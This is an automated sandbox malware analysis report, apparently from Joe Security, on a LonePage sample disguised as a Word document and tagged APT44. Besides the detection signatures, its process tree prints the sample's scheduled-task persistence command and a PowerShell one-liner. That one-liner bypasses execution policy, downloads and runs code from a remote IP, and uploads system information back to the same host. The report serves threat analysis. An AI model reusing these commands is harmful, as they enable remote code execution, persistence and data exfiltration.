Edit tour
Windows
Analysis Report
0438.doc.exe
Overview
General Information
Sample name: | 0438.doc.exerenamed because original name is a hash value |
Original sample name: | 05.2022 -..doc.exe |
Analysis ID: | 1431573 |
MD5: | b8a51009c3b6ed621e6c50c49b2e6269 |
SHA1: | 485b1c739d4c7aaa22a58af4afecc20b71d662de |
SHA256: | d02075bb8cfa13ee496efdca74ec024ea5777559ba82e57bd2ed24354fb8e594 |
Tags: | APT44exeSHARPIVORY |
Infos: | |
Detection
LonePage
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Yara detected LonePage
.NET source code contains suspicious base64 encoded strings
.NET source code contains very large strings
Bypasses PowerShell execution policy
Machine Learning detection for sample
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- 0438.doc.exe (PID: 6984 cmdline:
"C:\Users\ user\Deskt op\0438.do c.exe" MD5: B8A51009C3B6ED621E6C50C49B2E6269) - WINWORD.EXE (PID: 2296 cmdline:
"C:\Progra m Files (x 86)\Micros oft Office \Root\Offi ce16\WINWO RD.EXE" /n "C:\Users \user\Desk top\05.202 2 ??????? ?????????? -????.???? ??.doc" /o "" MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678) - schtasks.exe (PID: 5728 cmdline:
"C:\Window s\System32 \schtasks. exe" /crea te /tn One DriveStand al0ne /tr C:\Users\P ublic\Libr aries\OneD riveUpdate .js /sc mi nute /mo 2 0 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2) - conhost.exe (PID: 5736 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 3716 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\Public\L ibraries\O neDriveUpd ate.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7424 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -execution policy byp ass -w hid den -nopro file -c $i ik=new-obj ect net.we bclient;$f lm=$iik.do wnloaddata ('http://2 17.12.218. 107:30139/ GvAIGRxavb GeLRAx/pag e61/upgrad e.txt');if ($flm.Leng th -gt 1){ $jkr=[syst em.text.en coding]::u tf8.getStr ing($flm); if($jkr -m atch 'get- content'){ [byte[]] $ drpy=IEX $ jkr;}else{ $bjdo=whoa mi;$bjdo+= '==';$bjdo +=[System. Net.Dns]:: GetHostAdd resses($ip )+[System. Environmen t]::NewLin e;$bjdo+=I EX $jkr|ou t-string;[ byte[]]$dr py=[system .text.enco ding]::Utf 8.GetBytes ($bjdo);}; $ujk=new-o bject net. webclient; $ujk.uploa ddata('htt p://217.12 .218.107:2 5928/page6 1',$drpy); } MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7432 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_LonePage | Yara detected LonePage | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_LonePage | Yara detected LonePage | Joe Security | ||
JoeSecurity_LonePage | Yara detected LonePage | Joe Security | ||
JoeSecurity_LonePage | Yara detected LonePage | Joe Security | ||
JoeSecurity_LonePage | Yara detected LonePage | Joe Security | ||
JoeSecurity_LonePage | Yara detected LonePage | Joe Security | ||
Click to see the 9 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: frack113: |